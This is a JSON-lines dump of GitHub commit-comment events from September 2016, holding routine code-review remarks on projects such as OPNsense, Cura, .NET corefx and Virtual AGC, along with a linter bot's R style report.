{"id":"4532887590","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":18942071,"position":null,"line":null,"path":null,"commit_id":"af66f0da7c4a80d61cafef7de1a54ddc137ee1e6","created_at":"2016-09-08T09:36:51Z","updated_at":"2016-09-08T09:36:51Z","body":"If this is solely for plugging in the Intel driver it may be overkill. We can always wrap the driver as a plugin and can do this from the post install script with simple shell commands. The install-register and reboot even with the em(4) driver in the kernel works, right? There is some more glue we can add to make pkg install scripts writing easier in the future. We won't be able to get rid of this code here if people start using it..."}},"created_at":"2016-09-08T09:36:51Z"}
{"id":"4532891269","type":"CommitCommentEvent","actor":{"login":"kms-nhien-truong"},"repo":{"name":"thingan/KMS-Training"},"payload":{"comment":{"id":18942084,"position":88,"line":88,"path":"src/test/java/utility/Utils.groovy","commit_id":"a0a8cce3a79957d8e9973e1bab6fca8c52d04e3e","created_at":"2016-09-08T09:37:36Z","updated_at":"2016-09-08T09:37:36Z","body":"please consider using switch case or else if to ensure that one of the blocks of code will be executed.\r\nFor this case, it will executed several times"}},"created_at":"2016-09-08T09:37:36Z"}
{"id":"4532891936","type":"CommitCommentEvent","actor":{"login":"dira"},"repo":{"name":"Murzic/feed_manager"},"payload":{"comment":{"id":18942086,"position":6,"line":6,"path":"test/services/feed_import/service_test.rb","commit_id":"aadebb41f5a05425a7e4983431ac293ce1a4006d","created_at":"2016-09-08T09:37:43Z","updated_at":"2016-09-08T09:37:43Z","body":"👍 "}},"created_at":"2016-09-08T09:37:43Z"}
{"id":"4532896979","type":"CommitCommentEvent","actor":{"login":"fieldOfView"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18942093,"position":6,"line":727,"path":"cura/CuraApplication.py","commit_id":"dd1effdb8135ce67677a4673571a01ec88949e97","created_at":"2016-09-08T09:38:41Z","updated_at":"2016-09-08T09:38:41Z","body":"This wasn't working for groups, but that has since been fixed."}},"created_at":"2016-09-08T09:38:41Z"}
{"id":"4532897384","type":"CommitCommentEvent","actor":{"login":"kms-nhien-truong"},"repo":{"name":"thingan/KMS-Training"},"payload":{"comment":{"id":18942095,"position":8,"line":8,"path":"target/classes/log4j.properties","commit_id":"a0a8cce3a79957d8e9973e1bab6fca8c52d04e3e","created_at":"2016-09-08T09:38:46Z","updated_at":"2016-09-08T09:38:46Z","body":"The below binary files (such as class, jar) should not be included in the source version control."}},"created_at":"2016-09-08T09:38:46Z"}
{"id":"4532908635","type":"CommitCommentEvent","actor":{"login":"fieldOfView"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18942112,"position":59,"line":336,"path":"cura/BuildVolume.py","commit_id":"35168ddd5a7ce0cf2b974d3f377c58fac876a8bd","created_at":"2016-09-08T09:41:00Z","updated_at":"2016-09-08T09:41:00Z","body":"(badly) commented out code"}},"created_at":"2016-09-08T09:41:00Z"}
{"id":"4532911133","type":"CommitCommentEvent","actor":{"login":"earthquakesan"},"repo":{"name":"big-data-europe/docker-hive"},"payload":{"comment":{"id":18942115,"position":null,"line":null,"path":null,"commit_id":"f045946f91e966e3943d6994040b516d50af0ec7","created_at":"2016-09-08T09:41:29Z","updated_at":"2016-09-08T09:41:29Z","body":"Unfortunately 2.1.1 and 2.2.0 is not available from the repository yet. They are not released. As stated in the issue, connectivity to Hive should not be affected by this."}},"created_at":"2016-09-08T09:41:29Z"}
{"id":"4532912728","type":"CommitCommentEvent","actor":{"login":"Igor7779"},"repo":{"name":"tmrts/go-patterns"},"payload":{"comment":{"id":18942118,"position":3,"line":3,"path":"fan/fan_in.go","commit_id":"4bd71e70e3530735f470f9328b38c16ddb325ad0","created_at":"2016-09-08T09:41:47Z","updated_at":"2016-09-08T09:41:47Z","body":"importSync"}},"created_at":"2016-09-08T09:41:47Z"}
{"id":"4532913716","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18942121,"position":7,"line":355,"path":"application/helpers/replacements_helper.php","commit_id":"fd5ca4333388f092d69c0133f3a46f323c330d00","created_at":"2016-09-08T09:41:59Z","updated_at":"2016-09-08T09:41:59Z","body":"not only\r\n\r\nin fact : i don't think we need hidden in this sytem : some template can want it like abutton (me for example, seems Mazi too) and some other like a link (default from Louis).\r\n\r\nPS : button work without js, link need js"}},"created_at":"2016-09-08T09:41:59Z"}
{"id":"4532914410","type":"CommitCommentEvent","actor":{"login":"dira"},"repo":{"name":"Murzic/feed_manager"},"payload":{"comment":{"id":18942123,"position":10,"line":6,"path":"app/controllers/feed/imports_controller.rb","commit_id":"c36e355a0d0dca543060c1d1ede97e38d2f09a05","created_at":"2016-09-08T09:42:10Z","updated_at":"2016-09-08T09:42:10Z","body":"I was asking because to me it looks like the \"set strategy\" logic is something internal, and \"set the file\" is public. So mixing the two in a public method called \"set_strategy\" is confusing for me. It would be easier to use something like `Import::Service.new.create(file)`"}},"created_at":"2016-09-08T09:42:10Z"}
{"id":"4532921544","type":"CommitCommentEvent","actor":{"login":"mojinet"},"repo":{"name":"mojinet/ajoutDeLien"},"payload":{"comment":{"id":18942138,"position":null,"line":null,"path":null,"commit_id":"529957c1f8becef38b50e528a8f3d24c37502c19","created_at":"2016-09-08T09:43:34Z","updated_at":"2016-09-08T09:43:34Z","body":"modification du fichier readme.txt"}},"created_at":"2016-09-08T09:43:34Z"}
{"id":"4532923284","type":"CommitCommentEvent","actor":{"login":"wkentaro"},"repo":{"name":"ros-perception/opencv_apps"},"payload":{"comment":{"id":18942142,"position":7,"line":137,"path":"src/nodelet/lk_flow_nodelet.cpp","commit_id":"3ab28cf0bc07d4ce53537650bfd9cb59ab3be07f","created_at":"2016-09-08T09:43:54Z","updated_at":"2016-09-08T09:43:54Z","body":"Possibly, but please test it on your pc or create a test, because there might be a bug."}},"created_at":"2016-09-08T09:43:54Z"}
{"id":"4532928177","type":"CommitCommentEvent","actor":{"login":"fieldOfView"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18942154,"position":27,"line":196,"path":"cura/BuildVolume.py","commit_id":"35168ddd5a7ce0cf2b974d3f377c58fac876a8bd","created_at":"2016-09-08T09:44:53Z","updated_at":"2016-09-08T09:44:53Z","body":"I'm not too happy with the addition of a single-use hardcoded color somewhere halfway through the code. But I guess that is for another time."}},"created_at":"2016-09-08T09:44:53Z"}
{"id":"4532931222","type":"CommitCommentEvent","actor":{"login":"GPF253904828"},"repo":{"name":"GPF253904828/QRCode"},"payload":{"comment":{"id":18942161,"position":null,"line":null,"path":null,"commit_id":"2308b6ec866490e12551eecfa2119b6dffb74317","created_at":"2016-09-08T09:45:28Z","updated_at":"2016-09-08T09:45:28Z","body":"def g"}},"created_at":"2016-09-08T09:45:28Z"}
{"id":"4532932952","type":"CommitCommentEvent","actor":{"login":"jackha"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18942170,"position":5,"line":3301,"path":"resources/definitions/fdmprinter.def.json","commit_id":"ee55e03911e1ef765b565317f5bfe964b5e7c90e","created_at":"2016-09-08T09:45:47Z","updated_at":"2016-09-08T09:45:47Z","body":"Shouldn't it be min(machine_width, machine_depth)? Not that it supports any use case... "}},"created_at":"2016-09-08T09:45:47Z"}
{"id":"4532936193","type":"CommitCommentEvent","actor":{"login":"vamposdecampos"},"repo":{"name":"christinaa/rpi-open-firmware"},"payload":{"comment":{"id":18942175,"position":null,"line":null,"path":null,"commit_id":"9eed9d06e01a7f2c6dc2bd1e0138ce877ac10f5b","created_at":"2016-09-08T09:46:25Z","updated_at":"2016-09-08T09:46:25Z","body":"`fdt_setprop()` should also append, but you may need to give it room to do that, e.g. with `fdt_open_into()`.  Also it may not be able to follow paths, one may need to fetch `fdt_path_offset(v_fdt, \"/chosen\")` first."}},"created_at":"2016-09-08T09:46:25Z"}
{"id":"4532943764","type":"CommitCommentEvent","actor":{"login":"NeoBlack"},"repo":{"name":"b13/t3ext-seo_basics"},"payload":{"comment":{"id":18942195,"position":null,"line":null,"path":null,"commit_id":"0b9dad35aaeb22d32ae0e5f95b9bf7d332489f4f","created_at":"2016-09-08T09:47:58Z","updated_at":"2016-09-08T09:47:58Z","body":"pushed an update"}},"created_at":"2016-09-08T09:47:58Z"}
{"id":"4532944677","type":"CommitCommentEvent","actor":{"login":"tripledub"},"repo":{"name":"finddx/cdx"},"payload":{"comment":{"id":18942198,"position":null,"line":null,"path":null,"commit_id":"dc1e7a2ec6f608756b24bf5f21fc35087e1d5b6e","created_at":"2016-09-08T09:48:11Z","updated_at":"2016-09-08T09:48:11Z","body":"I added the build command in the circle ci admin panel, but could probably add it here instead"}},"created_at":"2016-09-08T09:48:11Z"}
{"id":"4532952010","type":"CommitCommentEvent","actor":{"login":"mattbenic"},"repo":{"name":"LumaDigital/AtomicGameEngine"},"payload":{"comment":{"id":18942217,"position":12,"line":null,"path":"Source/ToolCore/Assets/Asset.cpp","commit_id":"f25fc92ea19811d803bac17876a95069dafdb3a9","created_at":"2016-09-08T09:49:36Z","updated_at":"2016-09-08T09:49:36Z","body":"Suggest .abl here to avoid conflicts."}},"created_at":"2016-09-08T09:49:36Z"}
{"id":"4532957334","type":"CommitCommentEvent","actor":{"login":"ophthal"},"repo":{"name":"ophthal/openEMR_2"},"payload":{"comment":{"id":18942221,"position":null,"line":null,"path":null,"commit_id":"8b6b4f59204b17b1d58b3d020a7cce617c163a85","created_at":"2016-09-08T09:50:42Z","updated_at":"2016-09-08T09:50:42Z","body":"Glad to be of help."}},"created_at":"2016-09-08T09:50:42Z"}
{"id":"4532961401","type":"CommitCommentEvent","actor":{"login":"taoyake"},"repo":{"name":"taoyake/learngit"},"payload":{"comment":{"id":18942228,"position":null,"line":null,"path":null,"commit_id":"f776eab655f61f838043956aef90e366468ce462","created_at":"2016-09-08T09:51:31Z","updated_at":"2016-09-08T09:51:31Z","body":"git rm readme.txt"}},"created_at":"2016-09-08T09:51:31Z"}
{"id":"4532964427","type":"CommitCommentEvent","actor":{"login":"ujjwalt"},"repo":{"name":"ghoseb/dotemacs"},"payload":{"comment":{"id":18942235,"position":3,"line":2,"path":"Cask","commit_id":"2337f27c44e02c38b78a6495bc2a001966e49c98","created_at":"2016-09-08T09:52:09Z","updated_at":"2016-09-08T09:52:09Z","body":"This change makes some of the dependencies like the badger theme unavailable."}},"created_at":"2016-09-08T09:52:09Z"}
{"id":"4532966471","type":"CommitCommentEvent","actor":{"login":"mattbenic"},"repo":{"name":"LumaDigital/AtomicGameEngine"},"payload":{"comment":{"id":18942237,"position":5,"line":null,"path":"Script/Packages/Atomic/Atomic3D.json","commit_id":"f25fc92ea19811d803bac17876a95069dafdb3a9","created_at":"2016-09-08T09:52:29Z","updated_at":"2016-09-08T09:52:29Z","body":"This doesn't need to be here. These are the header files included _other_ than the ones detected by the parser. ie dependencies."}},"created_at":"2016-09-08T09:52:29Z"}
{"id":"4532968971","type":"CommitCommentEvent","actor":{"login":"taoyake"},"repo":{"name":"taoyake/learngit"},"payload":{"comment":{"id":18942240,"position":null,"line":null,"path":null,"commit_id":"f776eab655f61f838043956aef90e366468ce462","created_at":"2016-09-08T09:53:02Z","updated_at":"2016-09-08T09:53:02Z","body":"git rm learngit"}},"created_at":"2016-09-08T09:53:02Z"}
{"id":"4532969206","type":"CommitCommentEvent","actor":{"login":"tarantonio"},"repo":{"name":"peonso/tibialegacyserver"},"payload":{"comment":{"id":18942243,"position":null,"line":null,"path":null,"commit_id":"0c95e62c18f6abd3daf65045383a70d970f42b7c","created_at":"2016-09-08T09:53:05Z","updated_at":"2016-09-08T09:53:05Z","body":"In stock Tibia client 7.72 there is no server log channel like in OTClient.\r\nIs there any workaround to show the message in default channel or open a server log channel on stock client? "}},"created_at":"2016-09-08T09:53:05Z"}
{"id":"4532971751","type":"CommitCommentEvent","actor":{"login":"yuchi"},"repo":{"name":"smclab/liferay-plugins"},"payload":{"comment":{"id":18942251,"position":null,"line":null,"path":null,"commit_id":"59ed1b1ac139b2c0b8620c877913267102a1f9d5","created_at":"2016-09-08T09:53:36Z","updated_at":"2016-09-08T09:53:36Z","body":"LGTM"}},"created_at":"2016-09-08T09:53:36Z"}
{"id":"4532975675","type":"CommitCommentEvent","actor":{"login":"beardyjay"},"repo":{"name":"beardyjay/warvox"},"payload":{"comment":{"id":18942260,"position":null,"line":null,"path":null,"commit_id":"8fdd0ce12f1878c6cc3beb90b33d68144eac45be","created_at":"2016-09-08T09:54:20Z","updated_at":"2016-09-08T09:54:20Z","body":"Previously it looked like [This](http://i.imgur.com/xDssvER.png)"}},"created_at":"2016-09-08T09:54:20Z"}
{"id":"4532978788","type":"CommitCommentEvent","actor":{"login":"philpl"},"repo":{"name":"alex3165/react-mapbox-gl"},"payload":{"comment":{"id":18942269,"position":null,"line":null,"path":null,"commit_id":"9e1660e40b25cafe9f6268e6f32cc947b511c58d","created_at":"2016-09-08T09:54:57Z","updated_at":"2016-09-08T09:54:57Z","body":"@maxwell-oroark If you want to import json files in your webpack build, you need the `json-loader`. Likewise for every file that you want to transform / import you need different webpack loaders."}},"created_at":"2016-09-08T09:54:57Z"}
{"id":"4532980661","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/Github_repo"},"payload":{"comment":{"id":18942278,"position":null,"line":null,"path":null,"commit_id":"845d79c36aabbb84f7e9cf142527e540896785fd","created_at":"2016-09-08T09:55:20Z","updated_at":"2016-09-08T09:55:20Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8080/ui#review:id=12)"}},"created_at":"2016-09-08T09:55:20Z"}
{"id":"4532981531","type":"CommitCommentEvent","actor":{"login":"Pakhimoyn"},"repo":{"name":"QuickBlox/QMChatViewController-ios"},"payload":{"comment":{"id":18942281,"position":230,"line":274,"path":"QMChatViewController/QMChatDataSource/QMChatDataSource.m","commit_id":"fb91417cd9f6fe3f55ac55ca7fdbeccb3ffb7435","created_at":"2016-09-08T09:55:30Z","updated_at":"2016-09-08T09:55:30Z","body":"letonhossin@gmail.com\n"}},"created_at":"2016-09-08T09:55:30Z"}
{"id":"4532986541","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/Github_repo"},"payload":{"comment":{"id":18942290,"position":null,"line":null,"path":null,"commit_id":"845d79c36aabbb84f7e9cf142527e540896785fd","created_at":"2016-09-08T09:56:27Z","updated_at":"2016-09-08T09:56:27Z","body":"Collaborator:\nCorresponding review in collaborator has been deleted."}},"created_at":"2016-09-08T09:56:27Z"}
{"id":"4532986724","type":"CommitCommentEvent","actor":{"login":"AdSchellevis"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":18942292,"position":null,"line":null,"path":null,"commit_id":"af66f0da7c4a80d61cafef7de1a54ddc137ee1e6","created_at":"2016-09-08T09:56:29Z","updated_at":"2016-09-08T09:56:29Z","body":"@fichtner other drivers might need the same treatment, so that's why I rather add functionality to edit the loader.conf.local using some simple commands, in stead of pushing the edit into the package. Advantage is that packages can very easily install/deinstall necessary bootup parameters, keeping the wrappers clean and simple.\r\n"}},"created_at":"2016-09-08T09:56:29Z"}
{"id":"4532988217","type":"CommitCommentEvent","actor":{"login":"mpcjanssen"},"repo":{"name":"mpcjanssen/simpletask-android"},"payload":{"comment":{"id":18942296,"position":36,"line":0,"path":"src/main/java/nl/mpcjanssen/simpletask/Simpletask.kt","commit_id":"c9ac2124968170e533fb6ddc8d75618a4984c08a","created_at":"2016-09-08T09:56:44Z","updated_at":"2016-09-08T09:56:44Z","body":"In studio you'll get a warning that the function isn't used."}},"created_at":"2016-09-08T09:56:44Z"}
{"id":"4532988344","type":"CommitCommentEvent","actor":{"login":"Dulciphi"},"repo":{"name":"cosmicdan/ReignModpack"},"payload":{"comment":{"id":18942298,"position":null,"line":null,"path":null,"commit_id":"6509183a6bf889dfc26aa773ce2d4a64ff507791","created_at":"2016-09-08T09:56:45Z","updated_at":"2016-09-08T09:56:45Z","body":"Can we talk about this? I'm not sure about it and definitely not saying no or never but there's a few questions. Sedimentary stones exist in strata closer to the surface. They're much softer/easier to mine than their cobble-bearing counterparts. They are already oredicted as smooth stone ...but can't be chiseled. Oh. I guess it doesn't make sense to smelt them into cobble.. Would it make sense to smelt them into smooth stone? That's the only other option I can think of for now. I can see the need for the change (didn't realise they couldn't be chiseled). It will also be helpful for players who spawn in an area with surface sedimentary stone. I've done that and had to mine for a bit before I was able to make a furnace. It made for a harder start - definitely. Yeah. Fair enough. "}},"created_at":"2016-09-08T09:56:45Z"}
{"id":"4532989417","type":"CommitCommentEvent","actor":{"login":"PawelGutkowski"},"repo":{"name":"openmrs/openmrs-distro-referenceapplication"},"payload":{"comment":{"id":18942302,"position":18,"line":44,"path":"pom.xml","commit_id":"abc65fc6ee8babf10fe06d853527301bac7f7693","created_at":"2016-09-08T09:56:57Z","updated_at":"2016-09-08T09:56:57Z","body":"@dkayiwa we foung cause of errors, I've opened PR at providermanagement https://github.com/openmrs/openmrs-module-providermanagement/pull/7"}},"created_at":"2016-09-08T09:56:57Z"}
{"id":"4532989928","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"richelbilderbeek/Cer2016"},"payload":{"comment":{"id":18942305,"position":null,"line":null,"path":null,"commit_id":"b251812aa977e466e5b31de04e2af7911fa5e61a","created_at":"2016-09-08T09:57:03Z","updated_at":"2016-09-08T09:57:03Z","body":"[R/are_beast_replicates_from_same_distribution.R:5:1:](https://github.com/richelbilderbeek/Cer2016/blob/b251812aa977e466e5b31de04e2af7911fa5e61a/R/are_beast_replicates_from_same_distribution.R#L5) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​are_beast_replicates_from_same_distribution <- function(df) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/are_beast_replicates_from_same_distribution.R:27:33:](https://github.com/richelbilderbeek/Cer2016/blob/b251812aa977e466e5b31de04e2af7911fa5e61a/R/are_beast_replicates_from_same_distribution.R#L27) *style:* **Put spaces around all infix operators.**\n```r\n​    df <- plyr::rename(df, c(\"1\"=\"A\", \"2\"=\"B\"))\n                               ~^~\n```\n[R/are_beast_replicates_from_same_distribution.R:27:42:](https://github.com/richelbilderbeek/Cer2016/blob/b251812aa977e466e5b31de04e2af7911fa5e61a/R/are_beast_replicates_from_same_distribution.R#L27) *style:* **Put spaces around all infix operators.**\n```r\n​    df <- plyr::rename(df, c(\"1\"=\"A\", \"2\"=\"B\"))\n                                        ~^~\n```\n[R/are_from_same_distribution.R:9:1:](https://github.com/richelbilderbeek/Cer2016/blob/b251812aa977e466e5b31de04e2af7911fa5e61a/R/are_from_same_distribution.R#L9) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​{\n^\n```\n[R/are_from_same_distribution.R:11:6:](https://github.com/richelbilderbeek/Cer2016/blob/b251812aa977e466e5b31de04e2af7911fa5e61a/R/are_from_same_distribution.R#L11) *style:* **Commented code should be removed.**\n```r\n​    #message(\"Need at least one value in the first distribution\")\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/are_from_same_distribution.R:16:6:](https://github.com/richelbilderbeek/Cer2016/blob/b251812aa977e466e5b31de04e2af7911fa5e61a/R/are_from_same_distribution.R#L16) *style:* **Commented code should be removed.**\n```r\n​    #message(\"Need at least one value in the second distribution\")\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-are_beast_replicates_from_same_distribution.R:8:9:](https://github.com/richelbilderbeek/Cer2016/blob/b251812aa977e466e5b31de04e2af7911fa5e61a/tests/testthat/test-are_beast_replicates_from_same_distribution.R#L8) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​  df <- are_beast_replicates_from_same_distribution(nltt_stats)\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-are_beast_replicates_from_same_distribution.R:24:18:](https://github.com/richelbilderbeek/Cer2016/blob/b251812aa977e466e5b31de04e2af7911fa5e61a/tests/testthat/test-are_beast_replicates_from_same_distribution.R#L24) *style:* **Commas should always have a space after.**\n```r\n​    pi = rep(c(1,2), each = 100),\n                 ^\n```\n[tests/testthat/test-are_beast_replicates_from_same_distribution.R:28:9:](https://github.com/richelbilderbeek/Cer2016/blob/b251812aa977e466e5b31de04e2af7911fa5e61a/tests/testthat/test-are_beast_replicates_from_same_distribution.R#L28) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​  df <- are_beast_replicates_from_same_distribution(nltt_stats)\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-are_beast_replicates_from_same_distribution.R:42:18:](https://github.com/richelbilderbeek/Cer2016/blob/b251812aa977e466e5b31de04e2af7911fa5e61a/tests/testthat/test-are_beast_replicates_from_same_distribution.R#L42) *style:* **Commas should always have a space after.**\n```r\n​    pi = rep(c(1,2), each = 100),\n                 ^\n```\n[tests/testthat/test-are_beast_replicates_from_same_distribution.R:46:9:](https://github.com/richelbilderbeek/Cer2016/blob/b251812aa977e466e5b31de04e2af7911fa5e61a/tests/testthat/test-are_beast_replicates_from_same_distribution.R#L46) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​  df <- are_beast_replicates_from_same_distribution(nltt_stats)\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2016-09-08T09:57:03Z"}
{"id":"4532990598","type":"CommitCommentEvent","actor":{"login":"l1277314169"},"repo":{"name":"l1277314169/springMVC_com"},"payload":{"comment":{"id":18942306,"position":null,"line":null,"path":null,"commit_id":"de3b56bb08f39adeb935c1a0c60a376480d98b93","created_at":"2016-09-08T09:57:11Z","updated_at":"2016-09-08T09:57:11Z","body":"springMVC+spring+mybatis+shiro+angular"}},"created_at":"2016-09-08T09:57:11Z"}
{"id":"4532997471","type":"CommitCommentEvent","actor":{"login":"NzV"},"repo":{"name":"Necrobot-Private/NecroBot"},"payload":{"comment":{"id":18942326,"position":null,"line":null,"path":null,"commit_id":"b48c9fd893d296030df38c21e9aff255c1e5afdc","created_at":"2016-09-08T09:58:29Z","updated_at":"2016-09-08T09:58:29Z","body":"fixed"}},"created_at":"2016-09-08T09:58:29Z"}
{"id":"4532999628","type":"CommitCommentEvent","actor":{"login":"Raikerian"},"repo":{"name":"QuickBlox/QMChatViewController-ios"},"payload":{"comment":{"id":18942330,"position":230,"line":274,"path":"QMChatViewController/QMChatDataSource/QMChatDataSource.m","commit_id":"fb91417cd9f6fe3f55ac55ca7fdbeccb3ffb7435","created_at":"2016-09-08T09:58:53Z","updated_at":"2016-09-08T09:58:53Z","body":"@Pakhimoyn Hi, what is this email for? Any problems with current pull request?\r\n@mullayaasin Not sure what are you talking about, please specify the exact issue with pull request."}},"created_at":"2016-09-08T09:58:53Z"}
{"id":"4537374063","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18955441,"position":null,"line":null,"path":null,"commit_id":"42085eea4194c10be60caab7ca3626ecb9716b19","created_at":"2016-09-09T00:00:04Z","updated_at":"2016-09-09T00:00:04Z","body":"Also see [Issue 256: error: requested alignment is less than minimum alignment of 16 for type 'unsigned __int128 [8]'](http://github.com/weidai11/cryptopp/issues/256)"}},"created_at":"2016-09-09T00:00:04Z"}
{"id":"4537378063","type":"CommitCommentEvent","actor":{"login":"joperezr"},"repo":{"name":"steveharter/dotnet_corefx"},"payload":{"comment":{"id":18955458,"position":5,"line":5,"path":"src/System.Security.Cryptography.Csp/ref/project.json","commit_id":"7da85ab264d1eea863b49fed9114aec5b82c9179","created_at":"2016-09-09T00:01:12Z","updated_at":"2016-09-09T00:01:12Z","body":"It's ok to keep the Algorithms reference here even though the package hasn't updated. When building, the reference from the P2P reference will be preferred against the one resolved from the project.json. Plus, as I said in my previous comment, once I merge the package updates you will need to add it back."}},"created_at":"2016-09-09T00:01:12Z"}
{"id":"4537379552","type":"CommitCommentEvent","actor":{"login":"theo4u"},"repo":{"name":"Robophil/Product-Tour"},"payload":{"comment":{"id":18955467,"position":null,"line":null,"path":null,"commit_id":"126d082109c758f65a50916701e5b456e11dd9ae","created_at":"2016-09-09T00:01:34Z","updated_at":"2016-09-09T00:01:34Z","body":"dont you think is too hard coded, the css manipulation all inside the code, should still allow users to manipulate css that is hard coded, like extra options or use default "}},"created_at":"2016-09-09T00:01:34Z"}
{"id":"4537386873","type":"CommitCommentEvent","actor":{"login":"joperezr"},"repo":{"name":"steveharter/dotnet_corefx"},"payload":{"comment":{"id":18955481,"position":37,"line":22,"path":"src/System.Security.Cryptography.Csp/src/project.json","commit_id":"7da85ab264d1eea863b49fed9114aec5b82c9179","created_at":"2016-09-09T00:03:54Z","updated_at":"2016-09-09T00:03:54Z","body":"You don't need a netstandard1.6 here. All you are building is netstandard1.7 and net463, so those should be the only frameworks in this project.json"}},"created_at":"2016-09-09T00:03:54Z"}
{"id":"4537388771","type":"CommitCommentEvent","actor":{"login":"joperezr"},"repo":{"name":"steveharter/dotnet_corefx"},"payload":{"comment":{"id":18955486,"position":18,"line":16,"path":"src/System.Security.Cryptography.Csp/src/project.json","commit_id":"7da85ab264d1eea863b49fed9114aec5b82c9179","created_at":"2016-09-09T00:04:31Z","updated_at":"2016-09-09T00:04:31Z","body":"Same comment as before, you should add this Algorithms back and once I merge my PR later today the package will work"}},"created_at":"2016-09-09T00:04:31Z"}
{"id":"4537390257","type":"CommitCommentEvent","actor":{"login":"inclement"},"repo":{"name":"kivy/python-for-android"},"payload":{"comment":{"id":18955491,"position":null,"line":null,"path":null,"commit_id":"7c1da7216cd7df900ee4a7f787be39fb603487ba","created_at":"2016-09-09T00:04:59Z","updated_at":"2016-09-09T00:04:59Z","body":"This only definitely fixes things with SDL2. The other bootstraps, and the patch, need normalising to use the same env var."}},"created_at":"2016-09-09T00:04:59Z"}
{"id":"4537391475","type":"CommitCommentEvent","actor":{"login":"joperezr"},"repo":{"name":"steveharter/dotnet_corefx"},"payload":{"comment":{"id":18955496,"position":61,"line":46,"path":"src/System.Security.Cryptography.Csp/src/project.json","commit_id":"7da85ab264d1eea863b49fed9114aec5b82c9179","created_at":"2016-09-09T00:05:20Z","updated_at":"2016-09-09T00:05:20Z","body":"Doesn't look like you are building for uap10.1 so you shouldn't need this."}},"created_at":"2016-09-09T00:05:20Z"}
{"id":"4537391538","type":"CommitCommentEvent","actor":{"login":"indy91"},"repo":{"name":"rburkey2005/virtualagc"},"payload":{"comment":{"id":18955497,"position":null,"line":null,"path":null,"commit_id":"aeafd6d522082041d34a2ef213d705f4c1d72c03","created_at":"2016-09-09T00:05:21Z","updated_at":"2016-09-09T00:05:21Z","body":"Should be easy to convert our padload to something useful for you. The usual format in the launch scenarios is:\r\n\r\n`CMPAD0110 1144\r\n CMPAD1351 6510\r\n CMPAD1352 7025\r\n CMPAD1353 620\r\n CMPAD1354 0\r\n CMPAD1355 33260\r\n CMPAD1706 0\r\n CMPAD1707 20017\r\nCMPAD1710 20501`\r\n\r\nYou get the idea. Here a complete set, Apollo 11 in this case: https://github.com/dseagrav/NASSP/blob/master/Scenarios/Project%20Apollo%20-%20NASSP/Broken%20Scenarios/Virtual%20AGC/Apollo%2011%20-%20LVDC%2B%2B%20Launch.scn\r\n\r\nOur padload will slight deviate from the actual padloads of course because e.g. Orbiter only supports precession, but not nutation, so the AGC doesn't need a correction angle for the Earth nutation. Also our IMU is perfect, so there are no PIPA and IRIG compensation. That kind of stuff.\r\n\r\nOur padload for Apollo 9, 11 and 15 are probably the most useful. We don't use Colossus237 yet, so our Apollo 7 and 8 scenarios are also using Colossus249. I guess it would be safe to use our Apollo 8 padload for Colossus237, the differences between the versions is very small.\r\n\r\nI guess we could record landing radar data, once it produces useful information (not quite there yet). But they will of course be generated in real time, and there will always be deviations in Orbiter to the historical Apollo 11 trajectory."}},"created_at":"2016-09-09T00:05:21Z"}
{"id":"4537395087","type":"CommitCommentEvent","actor":{"login":"frankr612"},"repo":{"name":"mapfau/inputstream.mpd"},"payload":{"comment":{"id":18955502,"position":36,"line":960,"path":"src/MainDash.cpp","commit_id":"90912caf9b0a4b99be8768b58407a388f1f47495","created_at":"2016-09-09T00:06:29Z","updated_at":"2016-09-09T00:06:29Z","body":"This seems to break license acquiring for maxdome content. I tried to figure out why it is and as far as I understand, maxdome manifests set default_KID to something different then widevine (cenc). So even if license_type setting was set to \"com.widevine.alpha\", widevine is never used what eventually make the license acquiring fail.\r\n\r\nNot checking for dashtree_.defaultKID_.empty() made everything work again."}},"created_at":"2016-09-09T00:06:29Z"}
{"id":"4537395883","type":"CommitCommentEvent","actor":{"login":"nadako"},"repo":{"name":"vshaxe/vscode-debugadapter-extern"},"payload":{"comment":{"id":18955504,"position":4,"line":157,"path":"adapter/DebugSession.hx","commit_id":"ce4a20bd2f86f597302916adf0038910723e135d","created_at":"2016-09-09T00:06:44Z","updated_at":"2016-09-09T00:06:44Z","body":"just so you know, all fields are public by default, when the class is extern :)"}},"created_at":"2016-09-09T00:06:44Z"}
{"id":"4537396269","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/browser-android"},"payload":{"comment":{"id":18955505,"position":null,"line":null,"path":null,"commit_id":"0980091f964071b24a12ebab06a551924fff2102","created_at":"2016-09-09T00:06:51Z","updated_at":"2016-09-09T00:06:51Z","body":"++"}},"created_at":"2016-09-09T00:06:51Z"}
